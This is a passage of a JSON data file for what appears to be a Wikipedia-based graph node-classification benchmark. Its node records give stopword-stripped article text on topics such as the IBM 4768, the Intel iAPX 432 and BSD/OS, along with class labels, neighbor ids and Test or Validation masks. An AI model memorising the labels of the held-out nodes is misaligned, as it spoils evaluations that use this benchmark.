      9370,
      7325,
      3230,
      1193,
      3241,
      7340,
      5293,
      7341,
      9389,
      3248,
      11442,
      5299,
      11447,
      1211,
      7356,
      5314,
      1219,
      5315,
      7364,
      5328,
      1235,
      3284,
      11475,
      3286,
      5335,
      7382,
      7383,
      1242,
      9436,
      1245,
      1247,
      11488,
      9441,
      11489,
      7395,
      9444,
      1253,
      7398,
      7403,
      9452,
      5357,
      11501,
      9455,
      3315,
      5363,
      7411,
      9459,
      11509,
      11513,
      9466,
      3323,
      9468,
      1277,
      1278,
      5375,
      1286,
      3334,
      5383,
      7432,
      9485,
      11538,
      9491,
      7444,
      3349,
      3350,
      5397,
      1304,
      11539,
      3359,
      3362,
      9507,
      1316,
      5413,
      5414,
      7460,
      3368,
      9511,
      5418,
      1323,
      3371,
      11568,
      7477,
      1335,
      1336,
      5432,
      3386,
      7483,
      9535,
      3393,
      1346,
      1347,
      1348,
      3395,
      9542,
      3400,
      7497,
      5450,
      9544,
      5452,
      7501,
      11593,
      1360,
      5457,
      3410,
      7507,
      11601,
      9557,
      3414,
      5463,
      7511,
      11608,
      7515,
      5468,
      5471,
      3426,
      3429,
      3430,
      9578,
      9579,
      5484,
      7534,
      11635,
      3449,
      7552,
      1410,
      5506,
      1412,
      7554,
      5510,
      11652,
      9608,
      3465,
      7561,
      1419,
      3468,
      1422,
      7566,
      9616,
      11663,
      5523,
      11667,
      1429,
      7573,
      11673,
      1435,
      5531,
      7580,
      5534,
      3487,
      3488,
      11675,
      9635,
      1445,
      1449,
      11689,
      1451,
      9643,
      9644,
      7601,
      7603,
      5557,
      1464,
      1465,
      5560,
      5562,
      7608,
      1469,
      5569,
      1474,
      3522,
      5572,
      9665,
      7629,
      1491,
      7649,
      1506,
      9699,
      1508,
      1509,
      7655,
      9706,
      5612,
      3571,
      5619,
      3578,
      1531,
      7682,
      5636,
      7685,
      9733,
      9735,
      3594,
      1560,
      1561,
      3618,
      9762,
      7728,
      9780,
      7733,
      5686,
      9784,
      1594,
      9787,
      5694,
      9791,
      5698,
      9798,
      5703,
      5706,
      1611,
      3659,
      5711,
      3665,
      3667,
      9814,
      3675,
      5723,
      7771,
      9827,
      9829,
      5734,
      5737,
      9835,
      5743,
      9839,
      9842,
      9843,
      9844,
      1655,
      9848,
      5754,
      5759,
      1666,
      7810,
      1668,
      5771,
      9872,
      9882,
      9887,
      3744,
      1702,
      7847,
      7848,
      3753,
      3757,
      5805,
      9905,
      9907,
      9909,
      9915,
      5823,
      7872,
      9926,
      9927,
      1736,
      9930,
      7883,
      7884,
      1741,
      9931,
      3791,
      5840,
      9932,
      1750,
      9946,
      3804,
      7901,
      5856,
      5864,
      9964,
      1775,
      5873,
      5874,
      9972,
      7930,
      9978,
      7933,
      7934,
      1796,
      7943,
      7947,
      1804,
      9997,
      10000,
      7954,
      3867,
      7965,
      10016,
      3873,
      5923,
      1828,
      7975,
      10025,
      1839,
      7983,
      1844,
      10040,
      10041,
      7999,
      3904,
      1865,
      3914,
      8012,
      5969,
      5970,
      8020,
      10068,
      8031,
      3937,
      3944,
      10105,
      10108,
      6014,
      8063,
      10113,
      3970,
      8067,
      8069,
      3974,
      3976,
      3978,
      3984,
      8092,
      10142,
      1952,
      4001,
      4002,
      6049,
      1962,
      10156,
      8110,
      1971,
      8115,
      8118,
      1976,
      6075,
      6078,
      10177,
      1987,
      4040,
      8136,
      8137,
      6092,
      8141,
      2002,
      10195,
      4057,
      8155,
      6112,
      6116,
      6120,
      4073,
      4075,
      2028,
      4076,
      6126,
      6128,
      10224,
      2035,
      6138,
      10235,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5493,
    "label": 4,
    "text": "IBM_4768:ibm 4768 ibm 4768 pcie cryptographic coprocessor hardware security module hsm includes secure cryptoprocessor implemented high-security tamper resistant programmable pcie board specialized cryptographic electronics microprocessor memory random number generator housed within tamper-responding environment provide highly secure subsystem data processing cryptography performed sensitive key material never exposed outside physical secure boundary clear format ibm 4768 designed meet fips pub 140-2 level 4 highest level certification achievable commercial cryptographic devices achieved pci-hsm certification ibm 4768 data sheet describes coprocessor detail ibm supplies two cryptographic-system implementations applications may include financial pin transactions bank-to-clearing-house transactions emv transactions integrated circuit chip based credit cards general-purpose cryptographic applications using symmetric key algorithms hashing algorithms public key algorithms operational keys symmetric rsa private generated coprocessor saved either keystore file application memory encrypted master key coprocessor coprocessor identical master key use keys performance benefits include incorporation elliptic curve cryptography ecc format preserving encryption fpe hardware ibm supports 4768 certain ibm z mainframes crypto express6s cex6s feature code 0893 4768 cex6s part ibm support pervasive encryption drive encrypt data links point various relevant cryptographic standards iso 13491 secure cryptographic devices https //www.iso.org/standard/61137.html iso 9564 pin security https //www.iso.org/standard/68669.html ansi x9.24 part 1 key management using symmetric techniques https //webstore.ansi.org/recorddetail.aspx sku=ansi+x9.24-1-2017 ansi x9.24 part 2 key management using asymmetric techniques https //webstore.ansi.org/recorddetail.aspx sku=ansi+x9.24-2-2016 fips 140-2 https //nvlpubs.nist.gov/nistpubs/fips/nist.fips.140-2.pdf payment card industry pci pin transaction security pts hardware security module hsm modular security requirements search site https //www.pcisecuritystandards.org/document_library",
    "neighbors": [
      2383
    ],
    "mask": "None"
  },
  {
    "node_id": 5494,
    "label": 9,
    "text": "OBJ_(programming_language):obj programming language obj programming language family introduced joseph goguen 1976 family declarative ultra high-level languages features abstract types generic modules subsorts subtypes multiple inheritance pattern-matching modulo equations e-strategies user control laziness module expressions combining modules theories views describing module interfaces massively parallel rrm rewrite rule machine members obj family languages include cafeobj eqlog foops kumo maude obj3 obj3 version obj based order-sorted rewriting obj3 agent-oriented runs kyoto common lisp akcl",
    "neighbors": [
      6536,
      6201,
      8628,
      8262
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5495,
    "label": 4,
    "text": "Open_Threat_Exchange:open threat exchange open threat exchange otx world largest crowd-sourced computer-security platform 80,000 participants 140 countries share 19 million potential threats daily free use founded 2012 otx created run alienvault cybersecurity developer commercial open source solutions manage cyber attacks collaborative threat exchange created partly counterweight criminal hackers successfully working together sharing information viruses malware cyber attacks otx cloud-hosted information sharing covers wide range issues related security including viruses malware intrusion detection firewalls automated tools cleanse aggregate validate publish data shared participants data validated otx platform stripped information identifying participating contributor 2015 otx 2.0 added social network enables members share discuss research security threats including via real-time threat feed users share ip addresses websites attacks originated look specific threats see anyone already left information users subscribe “ pulse ” analysis specific threat including data ioc impact targeted software pulses exported stix json openloc maec csv used automatically update local security products users up-vote comment specific pulses assist others identifying important threats otx combines social contributions automated machine-to-machine tools integrates major security products firewalls perimeter security hardware platform read security report .pdf .csv .json open formats relevant information extracted automatically assisting professionals readily analyze data specific otx components include dashboard details top malicious ips around world check status specific ips notifications organization ip domain found hacker forum blacklist listed otx feature review log files determine communication known malicious ips 2016 alienvault released new version otx allowing participants create private communities discussions groups share information threats within group feature intended facilitate in-depth discussions specific threats particular industries different regions world threat data groups also distributed subscribers managed service providers using otx otx big data platform integrates natural language processing machine learning facilitate collection correlation data many sources including third-party threat feeds websites external api local agents 2015 alienvault partnered intel coordinate real-time threat information otx similar deal hewlett packard announced year facebook ibm threat exchange platforms facebook threatexchange beta requires application invitation join ibm launched ibm-force exchange april 2015",
    "neighbors": [
      10858,
      3323,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5496,
    "label": 9,
    "text": "Friedrich_L._Bauer:friedrich l. bauer friedrich ludwig fritz bauer 10 june 1924 – 26 march 2015 german computer scientist professor technical university munich bauer earned abitur 1942 served wehrmacht world war ii 1943 1945 1946 1950 studied mathematics theoretical physics ludwig-maximilians-universität munich bauer received doctorate supervision fritz bopp thesis gruppentheoretische untersuchungen zur theorie der spinwellengleichungen group-theoretic investigations theory spin wave equations 1952 completed habilitation über quadratisch konvergente iterationsverfahren zur lösung von algebraischen gleichungen und eigenwertproblemen quadratically convergent iteration methods solving algebraic equations eigenvalue problems 1954 technical university munich teaching privatdozent ludwig-maximilians-universität 1954 1958 became extraordinary professor applied mathematics university mainz since 1963 worked professor mathematics since 1972 computer science technical university munich retired 1989 bauer early work involved construction computing machinery e.g logical relay computer stanislaus 1951-1955 context first propose widely used stack method expression evaluation bauer also worked committees developed imperative computer programming languages algol 58 successor algol 60 important predecessors modern imperative programming languages 1968 bauer coined term software engineering widespread use since bauer influential figure establishing computer science independent subject german universities scientific contributions spread numerical analysis bauer–fike theorem fundamentals interpretation translation programming languages later works systematics program development especially program transformation methods systems cip-s associated wide-spectrum language system cip-l also wrote well-respected book cryptology decrypted secrets fourth edition doctoral advisor 39 students including manfred broy david gries manfred paul gerhard seegmüller josef stoer peter wynn christoph zenger friedrich bauer married hildegard bauer-vogg father three sons two daughters bauer colleague german representative nato science committee 1967 nato discussing 'the software crisis bauer suggested term 'software engineering way conceive problem solution 1972 bauer published following definition software engineering br establishment use sound engineering principles economically obtain software reliable works real machines efficiently 2014 tu munich renamed largest lecture hall department informatics computer science friedrich bauer",
    "neighbors": [
      512,
      4608,
      11014,
      1180,
      4395,
      5946,
      8262,
      1610,
      1611,
      9804,
      10983,
      1641,
      5097,
      8813,
      1392,
      4980,
      1783,
      5496,
      8057
    ],
    "mask": "None"
  },
  {
    "node_id": 5497,
    "label": 5,
    "text": "Guard_interval:guard interval telecommunications guard intervals used ensure distinct transmissions interfere one another otherwise cause overlapping transmissions transmissions may belong different users tdma user ofdm purpose guard interval introduce immunity propagation delays echoes reflections digital data normally sensitive ofdm beginning symbol preceded guard interval long echoes fall within interval affect receiver ability safely decode actual data data interpreted outside guard interval tdma user timeslot ends guard period avoid data loss reduce interference following user caused propagation delay thus user timeslot protected interference preceding user guard interval guard period end preceding user timeslot common misconception tdma timeslot begins guard interval however itu technical specifications gsm 05.05 clearly define guard period end timeslot thus providing protection data loss within timeslot protection interference following timeslot longer guard periods allow distant echoes tolerated however longer guard intervals reduce channel efficiency example dvb-t four guard intervals available given fractions symbol period hence 1/32 gives lowest protection highest data rate 1/4 results best protection lowest data rate radio waves propagate speed light per 1000 meter 5 μs/mile ideally guard interval longer delay spread channel standard symbol guard interval used 802.11 ofdm increase data rate 802.11n added optional support guard interval provides 11 increase data rate shorter guard interval results higher packet error rate delay spread channel exceed guard interval and/or timing synchronization transmitter receiver precise scheme could developed work whether short guard interval would benefit particular link reduce complexity manufacturers typically implement short guard interval final rate adaptation step device running highest data rate",
    "neighbors": [
      2912,
      8160,
      11181
    ],
    "mask": "Test"
  },
  {
    "node_id": 5498,
    "label": 3,
    "text": "SPARCstation_2:sparcstation 2 sparcstation 2 ss2 code named calvin sun 4/75 sparc workstation computer sold sun microsystems based sun4c architecture implemented pizza box form factor 40mhz cypress cy7c601 cpu 28.5 mips ti tms390c601a fpu 4.2 mflops known cpu upgrade option weitek 80mhz sparc power µp power-up sparcstation 2 configured 128 mb memory total 64 mb motherboard additional 64 mb using special 32 mb sbus memory card another 32 mb piggy-backed daughterboard 16 ram slots motherboard populated either 1 mb simms total 16 mb 4 mb simms total 64 mb standard 30 pin simms used long use parity error detection rated 80 ns faster sparcstation 2 uses standard 50 pin scsi interface house two 3 1/2 full height disk drives ss2 also comes special auto-ejecting 1.44 mb floppy disk drive modern 80-pin single connector attachment sca scsi drives used internally adapter plastic drive sled used 50-pin drives must cut allow clearance adapter board sca drives may run hotter original scsi drives cause heating issues especially two drives installed ethernet aui port board supplemented add-on sbus cards onboard ethernet provided amd lance am7990 ethernet controller external aui transceivers required connection 10base5 10base2 10baset ethernet physical layer media openboot rom able boot network using rarp tftp sparcstation 2 uses m48t02 battery-backed rtc ram chip handles real time clock boot parameter storage problem chip battery internal means entire chip must replaced battery runs sun4c machines older battery life chip substantial number systems refuse boot additionally sun4c design used reserved bits m48t02 nvram non-standard way since later revisions m48t02 chip exert stricter control bits current m48t02 store nvram data rtc function correctly system may fail auto-boot due incompatibilities modern m48t02s common modify failed nvrams cutting encapsulation patching new battery also possible replace entire encapsulation also contains 32.768 khz clock crystal following operating systems run sparcstation 2",
    "neighbors": [
      9665,
      11553,
      9955,
      10436,
      3241,
      823,
      9422,
      11501,
      6006,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 5499,
    "label": 7,
    "text": "SoftLayer:softlayer softlayer technologies inc. dedicated server managed hosting cloud computing provider founded 2005 acquired ibm 2013 softlayer established 2005 lance crosby several ex-coworkers gi partners acquired majority equity stake softlayer august 2010 november year merged company planet internet services softlayers ’ biggest competitor consolidated customer base softlayer brand q1 2011 company reported hosting 81,000 servers 26,000 customers locations throughout united states july 2011 company announced plans international expansion amsterdam singapore add existing network us-based data centers dallas texas san jose california seattle washington santiago de querétaro mexico houston texas washington d.c.. data centers leased via digital realty trust may 2015 company 23 data centers 11 different countries june 4 2013 ibm announced acquisition softlayer disclosed financial terms according reuters deal could fetch 2 billion form ibm cloud services division time acquisition softlayer described biggest privately held cloud infrastructure provider iaas world 2018 softlayer renamed ibm cloud",
    "neighbors": [
      6018,
      1539,
      8451,
      6027,
      4236,
      10893,
      526,
      911,
      272,
      1935,
      8592,
      405,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      2217,
      6444,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      4289,
      11201,
      8515,
      10820,
      3269,
      4683,
      4429,
      590,
      1102,
      7248,
      8269,
      5202,
      467,
      9682,
      7512,
      9048,
      6618,
      10200,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      7660,
      8044,
      2170,
      3323,
      4604,
      253,
      8446,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 5500,
    "label": 2,
    "text": "Safe_mode:safe mode safe mode diagnostic mode computer operating system os also refer mode operation application software windows safe mode allows essential system programs services start boot safe mode intended help fix problems within operating system also widely used removing rogue security software microsoft windows macos android linux distributions ubuntu linux mint examples contemporary operating systems implement safe mode called safe boot macos well complex electronic devices safe mode operating system reduced functionality task isolating problems easier since many non-core components disabled sound installation boot safe mode typically major problem disk corruption installation poorly-configured software prevents operating system successfully booting normal operating mode though varies operating system safe mode typically loads essential executable modules disables devices except necessary display information accept input also take form parallel miniature operating system configuration information shared normal operating system example microsoft windows user also choose boot recovery console small text-based troubleshooting mode kept separate main operating system also accessed booting install cd various safe mode options run dysfunctional os features video drivers audio networking disabled safe mode typically provides access utility diagnostic programs user troubleshoot preventing operating system working normally safe mode intended maintenance functionality provides minimal access features microsoft windows safe mode 7/vista /xp /2000/me/98/95 accessed pressing f8 key operating system boots also multi-boot environment multiple versions windows installed side side f8 key pressed os selector prompt get safe mode however windows 8 released 2012 traditional press-f8-for-safe-mode-options ui convention longer works either shift-f8 special gui-based workaround necessary equivalently minimal setting unix-like operating systems single-user mode daemons x window system started root user log emergency repairs maintenance including resetting users passwords machine without need know old one macos holding shift key powering activates safe boot background maintenance features besides mode selection runs file system repair mac os 10.4 disables fonts /system/library/fonts moves trash font caches normally stored /library/caches/com.apple.ats/ uid uid user id number 501 disables startup items login items reset administrative account password unlike windows safe mode networking disabled default requires using safe mode networking enabled macos safe boot always includes networking classic mac os versions 6 7 8 9 similar mode unix root achieved holding shift key booting starts system without extensions application software sometimes offers safe mode well php interpreter prior version 5.4 safe mode offers stricter security measures glasgow haskell compiler version 7.2 offers safe haskell mode restricting usage functions unsafeperformio mozilla firefox safe mode allows user remove extensions may preventing browser loading internet explorer run add-ons mode protected mode cydia mobilesubstrate also safe mode allows user uninstall tweaks extensions may crash springboard",
    "neighbors": [
      6797,
      4111,
      5397,
      10392,
      7983,
      823,
      7739,
      11197,
      576,
      8644,
      4165,
      200,
      10839,
      7515,
      4957,
      5985,
      2027,
      9709,
      9714,
      2811,
      8829
    ],
    "mask": "Test"
  },
  {
    "node_id": 5501,
    "label": 3,
    "text": "Tagged_architecture:tagged architecture computer science tagged architecture particular type computer architecture every word memory constitutes tagged union divided number bits data tag section describes type data interpreted reference type object points notable examples american tagged architectures lisp machines tagged pointer support hardware opcode level burroughs large systems data-driven tagged descriptor-based architecture non-commercial rice computer burroughs lisp machine examples high-level language computer architectures tagging used support types high-level language hardware level addition original xerox smalltalk implementation used least-significant bit 16-bit word tag bit clear hardware would accept aligned memory address set treated shifted 15-bit integer current intel documentation mentions lower bits memory address might similarly used interpreter-based systems soviet union elbrus series supercomputers pioneered use tagged architectures 1973",
    "neighbors": [
      6754,
      10403,
      1702,
      9932,
      11218,
      372,
      1399,
      1820,
      7071
    ],
    "mask": "Test"
  },
  {
    "node_id": 5502,
    "label": 3,
    "text": "HB-F9P:hb-f9p hb-f9p sony msx2-computer launched 1985 abbreviation hb stands hit bit hb-f9p unusual sense come built floppy disk drive instead built software suite memovision would run automatically unless program cartridge inserted cartridge slot graph key pressed booting memovision could store data special hbi-55 battery backed ram data cartridge sony originally developed hb-55 hb-75 msx1 computers systems contained simple built program called personal databank memovision continuation idea much extended contained stuff like birthday calendar alarm system family databank combination text editor database built calculator timer time calculator rendered pseudo 3d style hb-f9 many different localized variants produced",
    "neighbors": [
      5128,
      11462,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 5503,
    "label": 3,
    "text": "Intel_iAPX_432:intel iapx 432 iapx 432 intel advanced performance architecture computer architecture introduced 1981 intel first 32-bit processor design main processor architecture general data processor implemented set two separate integrated circuits due technical limitations time project started 1975 8800 8008 8080 intended intel major design 1980s unlike 8086 designed following year successor 8080 iapx 432 radical departure intel previous designs meant different market niche completely unrelated 8080 x86 product lines iapx 432 project considered commercial failure intel discontinued 1986 iapx 432 referred micromainframe designed programmed entirely high-level languages instruction set architecture also entirely new significant departure intel previous 8008 8080 processors iapx 432 programming model stack machine visible general-purpose registers supported object-oriented programming garbage collection multitasking well conventional memory management directly hardware microcode direct support various data structures also intended allow modern operating systems implemented using far less program code ordinary processors intel imax 432 operating system 432 written entirely ada ada also intended primary language application programming aspects may seen high-level language computer architecture properties features resulted hardware microcode design complex processors era especially microprocessors however internal external buses mostly wider 16-bit like 32-bit microprocessors era 68000 32016 32-bit arithmetical instructions implemented 16-bit alu via random logic microcode kinds sequential logic iapx 432 enlarged address space 8080 also limited fact linear addressing data could still use 16-bit offsets somewhat akin intel first 8086-based designs including contemporary 80286 new 32-bit segment offsets 80386 architecture described publicly detail 1984 using semiconductor technology day intel engineers n't able translate design efficient first implementation along lack optimization premature ada compiler contributed rather slow expensive computer systems performing typical benchmarks roughly 1/4 speed new 80286 chip clock frequency early 1982 initial performance gap rather low-profile low-priced 8086 line probably main reason intel plan replace latter later known x86 iapx 432 failed although engineers saw ways improve next generation design iapx 432 capability architecture started regarded implementation overhead rather simplifying support intended originally designed clock frequencies 10 mhz actual devices sold specified maximum clock speeds 4 mhz 5 mhz 7 mhz 8 mhz peak performance 2 million instructions per second 8 mhz intel 432 project started 1975 year 8-bit intel 8080 completed year 16-bit 8086 project began 432 project initially named 8800 next step beyond existing intel 8008 8080 microprocessors became big step instruction sets 8-bit processors well fitted typical algol-like compiled languages however major problem small native addressing ranges 16k 8008 64k 8080 far small many complex software systems without using kind bank switching memory segmentation similar mechanism built 8086 years later intel aimed build sophisticated complete system lsi chips functionally equal better best 32-bit minicomputers mainframes requiring entire cabinets older chips system would support multiprocessors modular expansion fault tolerance advanced operating systems advanced programming languages large applications ultra reliability ultra security architecture would address needs intel customers decade iapx 432 development team managed bill lattin justin rattner lead engineer rattner would later become cto intel initially team worked santa clara march 1977 lattin team 17 engineers moved intel new site portland lead engineer iapx 432 fred pollack specialized superscalarity later became lead architect i686 chip intel pentium pro soon became clear would take several years many engineers design would similarly take several years progress moore law improved chip manufacturing could fit dense chips meanwhile intel urgently needed simpler interim product meet immediate competition motorola zilog national semiconductor intel began rushed project design 8086 low-risk incremental evolution 8080 using separate design team mass-market 8086 shipped 1978 8086 designed backward-compatible 8080 sense 8080 assembly language could mapped 8086 architecture using special assembler existing 8080 assembly source code albeit executable code thereby made upward compatible new 8086 degree contrast 432 software compatibility migration requirements architects total freedom novel design scratch using whatever techniques guessed would best large-scale systems software applied fashionable computer science concepts universities particularly capability machines object-oriented programming high-level cisc machines ada densely encoded instructions ambitious mix novel features made chip larger complex chip complexity limited clock speed lengthened design schedule core design — main processor — termed general data processor gdp built two integrated circuits one 43201 fetch decode instructions 43202 execute systems would also include 43203 interface processor ip operated channel controller i/o attached processor ap conventional intel 8086 provided processing power i/o subsystem largest designs era two-chip gdp combined count approximately 97,000 transistors single chip ip approximately 49,000 comparison motorola 68000 introduced 1979 approximately 40,000 transistors 1983 intel released two additional integrated circuits iapx 432 interconnect architecture 43204 bus interface unit biu 43205 memory control unit mcu chips allowed nearly glueless multiprocessor systems 63 nodes innovative features iapx 432 detrimental good performance many cases iapx 432 significantly slower instruction throughput conventional microprocessors era national semiconductor 32016 motorola 68010 intel 80286 one problem two-chip implementation gdp limited speed motherboard electrical wiring larger issue capability architecture needed large associative caches run efficiently chips room left instruction set also used bit-aligned variable-length instructions instead usual semi-fixed byte word-aligned formats used majority computer designs instruction decoding therefore complex designs although hamper performance used additional transistors mainly large barrel shifter design already lacking space transistors caches wider buses performance oriented features addition biu designed support fault-tolerant systems 40 bus time held wait states another major problem immature untuned ada compiler used high-cost object-oriented instructions every case instead faster scalar instructions would made sense instance iapx 432 included expensive inter-module procedure call instruction compiler used calls despite existence much faster branch link instructions another slow call enter_environment set memory protection compiler ran every single variable system even variables used inside existing environment checked make matters worse data passed procedures always passed value-return rather reference running dhrystone benchmark parameter passing took ten times longer computations combined according new york times i432 ran 5 10 times slowly competitor motorola 68000 iapx 432 one first systems implement new ieee-754 standard floating-point arithmetic outcome failure 432 microprocessor designers concluded object support chip leads complex design invariably run slowly 432 often cited counter-example proponents risc designs however hold oo support primary problem 432 implementation shortcomings especially compiler mentioned would made cpu design slow since iapx 432 one attempt similar design rekursiv processor although inmos transputer process support similar — fast intel spent considerable time money mindshare 432 skilled team devoted unwilling abandon entirely failure marketplace new architect—glenford myers—was brought produce entirely new architecture implementation core processor would built joint intel/siemens project later biin resulting i960-series processors i960 risc subset became popular time embedded processor market high-end 960mc tagged-memory 960mx marketed military applications according new york times intel collaboration hp merced processor later known itanium company comeback attempt high-end market iapx 432 instruction variable length peculiarly bit rather byte aligned instruction taking 6 321 bits iapx 432 hardware microcode support object-oriented programming capability-based addressing system uses segmented memory 2 segments 64 kb providing total virtual address space 2 bytes physical address space 2 bytes 16 mb programs able reference data instructions address instead must specify segment offset within segment segments referenced access descriptors ads provide index system object table set rights capabilities governing accesses segment segments may access segments contain access descriptors data segments contain ads hardware microcode rigidly enforce distinction data access segments allow software treat data access descriptors vice versa system-defined objects consist either single access segment access segment data segment system-defined segments contain data access descriptors system-defined data designated offsets though operating system user software may extend additional data system object type field checked microcode port object used carrier object needed user program define new object types get full benefit hardware type checking use type control objects tco release 1 iapx 432 architecture system-defined object typically consisted access segment optionally depending object type data segment specified access descriptor fixed offset within access segment release 3 architecture order improve performance access segments data segments combined single segments 128 kb split access part data part 0–64 kb reduced number object table lookups dramatically doubled maximum virtual address space iapx432 recognizes fourteen types predefined system objects software running 432 need explicitly deallocate objects longer needed instead microcode implements part marking portion edsger dijkstra on-the-fly parallel garbage collection algorithm mark-and-sweep style collector entries system object table contain bits used mark object white black grey needed collector imax 432 operating system includes software portion garbage collector executable instructions contained within system instruction object since instructions bit-aligned 16-bit bit displacement instruction object allows object contain 8192 bytes instructions 65,536 bits instructions consist operator consisting class opcode zero three operand references fields organized present information processor sequence required decoding frequently used operators encoded using fewer bits instruction begins 4 6 bit class field indicates number operands called order instruction length operand optionally followed 0 4 bit format field describes operands operands format present come zero three operands described format instruction terminated 0 5 bit opcode classes contain one instruction therefore opcode format field permits gdp appear programmer zero- one- two- three-address architecture format field indicates operand data reference top next-to-top element operand stack",
    "neighbors": [
      512,
      7173,
      4108,
      9741,
      5649,
      6675,
      2073,
      3613,
      10813,
      2638,
      10835,
      1119,
      7269,
      4204,
      8301,
      3700,
      8820,
      4217,
      8325,
      8851,
      6804,
      6813,
      6815,
      1702,
      9391,
      4276,
      2745,
      2237,
      5309,
      6339,
      7884,
      9932,
      728,
      10469,
      5356,
      5358,
      5871,
      1776,
      3317,
      5883,
      7421,
      256,
      2304,
      5380,
      5386,
      4886,
      3352,
      2345,
      7983,
      10548,
      7480,
      2874,
      10043,
      5444,
      4424,
      11596,
      9563,
      8551,
      5483,
      11637,
      10614,
      3459,
      3973,
      2951,
      9095,
      9611,
      5523,
      9111,
      3999,
      1952,
      10146,
      428,
      10669,
      1461,
      4034,
      3529,
      1998,
      5073,
      477,
      7134,
      1000,
      7657,
      8684,
      499
    ],
    "mask": "None"
  },
  {
    "node_id": 5504,
    "label": 4,
    "text": "CloudBerry_Lab:cloudberry lab cloudberry lab software company develops online backup file management solutions integrated 20 cloud storage providers cloudberry backup cloudberry explorer offered personal use “ freemium ” model products including advanced cloudberry backup solutions sold per license free trials available cloudberry managed backup backup-as-a-service solution managed service providers businesses provides centralized management monitoring backup restore desktops servers cloudberry managed backup cloudberry backup support windows windows server macos linux operating systems work microsoft sql server exchange applications vmware microsoft hyper-v virtualization solutions cloudberry lab incorporated 2011 initially releasing cloudberry explorer amazon s3 followed versions microsoft azure google cloud openstack swift 2011 company released cloudberry backup followed releases support windows server imaging microsoft sql server exchange applications bare metal restore windows server desktop operating systems cloudberry backup added support linux mac operating systems 2015 followed editions synology qnap 2012 company introduced cloudberry managed backup saas backup disaster recovery solution managed service providers businesses require centralized administration management larger environments 2018 company introduced cloudberry remote assistant free remote control desktop sharing solution designed secure access control remote desktops servers internet cloudberry lab develops software help managed service providers businesses consumers manage backup disaster recovery perform cloud file management synchronization company main products include cloudberry managed backup cloudberry backup cloudberry explorer cloudberry drive cloudberry backup managed backup solutions automate backup recovery files folders system images cloudberry backup standalone solution managed backup subscription saas offering managed service providers businesses adds centralized administration management reporting products designed backup cloud support backups local disk network shares latest product versions back data 20 different cloud storage providers including amazon s3 amazon glacier azure blob storage google cloud storage backblaze b2 wasabi openstack s3 compatible others cloudberry backup managed backup employ storage-agnostic model customers license software cloudberry contract directly cloud providers choice backup storage customers get choose cloud storage provider offers features pricing best suits needs customers change storage vendors time without change backup vendors way cloudberry lab support customers varying size need products provide end-to-end encryption data cloudberry explorer windows solution free paid licensing options managing files local storage remote online storage versions available amazon s3 microsoft azure google cloud openstack cloudberry drive solution mounts cloud storage windows desktop server product allows customers work cloud storage though local storage cloudberry remote assistant solution remote control desktop sharing software currently beta available microsoft windows free remote assistant encrypts connections includes text voice chat cloudberry lab amazon advanced technology partner company also established partnerships microsoft azure google cloud platform backblaze b2 wasabi autotask connectwise others",
    "neighbors": [
      7905,
      4194,
      9655,
      11201,
      6565,
      3366,
      6153,
      11178,
      3629,
      1358,
      1935,
      6797,
      467,
      11030,
      823,
      3800
    ],
    "mask": "Test"
  },
  {
    "node_id": 5505,
    "label": 5,
    "text": "DS4/NA:ds4/na digital signal 4/na ds4/na 139.264-mbit/s aggregate-multiplexed signal equivalent 3 digital signal 3s 2,016 digital signal 0s link commonly used long distance fiber carriage broadcast radio television platform 270mb/sec mpeg-2/asi transport stream circuits common use daily digital transmission broadcast television radio interconnecting sport arenas convention centers television stations broadcasters connections become part long-haul serial data transmission fiber sent purely serial data packetizing bandwidth sharing takes place tcp/ip carriers usually supplying circuits specialized often supplied us vyvx switch remote broadcast sports event example typically carried ds4 venue television network full unshared serial data circuit 270 megabits per second historically used appropriate gear circuit used emulate analog standard definition circuit using sampling rate 12-15 mhz carrying samples pcm format replaced dedicated coaxial cable circuits managed digital circuits use became rare early 21st century",
    "neighbors": [
      8192,
      2994,
      10100
    ],
    "mask": "None"
  },
  {
    "node_id": 5506,
    "label": 2,
    "text": "BSD/OS:bsd/os bsd/os originally called bsd/386 sometimes known bsdi discontinued proprietary version bsd operating system developed berkeley software design inc. bsdi bsd/os reputation reliability server roles renowned unix programmer author w. richard stevens used personal web server reason bsdi formed 1991 members computer systems research group csrg uc berkeley develop sell proprietary version bsd unix pc compatible systems intel 386 later processors made use work previously done bill jolitz port bsd pc platform bsd/386 1.0 released march 1993 company sold licenses support taking advantage terms bsd license permitted use bsd software proprietary systems long credit given author company turn contributed code resources development non-proprietary bsd operating systems meantime jolitz left bsdi independently released open source bsd pcs called 386bsd one advantages bsdi system complete thorough manpage documentation entire system including complete syntax argument explanations examples file usage authors cross-references commands manpage documentation far poorer modern linux systems bsd/386 licenses including source code priced 995 much less unix system v source licenses fact highlighted advertisements part settlement usl v. bsdi bsdi substituted code written university 4.4 bsd-lite release disputed code os effective release 2.0 time release 386 designation become dated bsd/386 renamed bsd/os later releases bsd/os also supported sun sparc-based systems marketing bsd/os became increasingly focused internet server applications however increasingly tight market unix-compatible software late 1990s early 2000s hurt sales bsd/os one end market lacked certification open group bear unix trademark sales force hardware support larger unix vendors simultaneously lacked negligible acquisition cost open source bsds linux bsd/os acquired wind river systems april 2001 wind river discontinued sales bsd/os end 2003 support terminated end 2004",
    "neighbors": [
      7552,
      6787,
      1927,
      4745,
      10761,
      6412,
      2061,
      4989,
      8975,
      9743,
      6675,
      5397,
      8469,
      8725,
      1304,
      2584,
      5534,
      3487,
      3872,
      1316,
      3241,
      684,
      4908,
      1839,
      3248,
      7983,
      2995,
      9141,
      1718,
      823,
      1080,
      953,
      9784,
      9151,
      9153,
      9665,
      3651,
      7748,
      8901,
      8262,
      9671,
      9927,
      10436,
      8395,
      6092,
      592,
      850,
      6361,
      9306,
      8539,
      9817,
      10202,
      607,
      3551,
      225,
      1634,
      6369,
      6888,
      873,
      9320,
      2028,
      9452,
      7022,
      2287,
      6129,
      5363,
      5492,
      1399,
      2424,
      633,
      8316,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5507,
    "label": 1,
